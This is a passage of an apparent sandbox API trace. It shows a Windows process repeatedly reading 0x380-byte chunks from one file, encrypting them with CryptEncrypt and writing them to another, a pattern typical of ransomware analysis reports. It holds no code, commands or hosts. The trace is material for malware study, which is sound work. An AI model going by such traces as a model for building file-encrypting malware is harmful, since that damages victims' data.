lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.741] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.742] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.742] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.742] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.742] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.742] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.742] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.742] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.742] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.743] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.743] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.743] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.743] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.743] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.743] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.743] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.743] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.743] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.743] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.743] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.743] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.743] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.744] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.744] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.744] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.744] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.744] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.744] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.744] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.744] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.744] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.744] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.744] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.744] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.744] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.744] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.745] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.745] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.745] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.745] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.745] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.745] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.745] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.745] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.745] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.745] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.745] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.745] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.745] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.745] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.745] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.745] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.746] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.746] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.746] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.746] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.746] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.746] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.746] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.746] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.746] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.746] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.746] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.746] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.746] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.747] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.747] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.747] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.747] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.747] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.747] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.747] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.747] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.747] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.747] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.747] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.747] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.747] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.748] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.748] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.748] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.748] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.748] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.748] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.748] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.748] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.748] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.748] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.748] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.748] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.748] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.748] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.748] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.749] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.749] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.749] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.749] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.749] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.749] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.749] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.749] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.749] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.749] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, 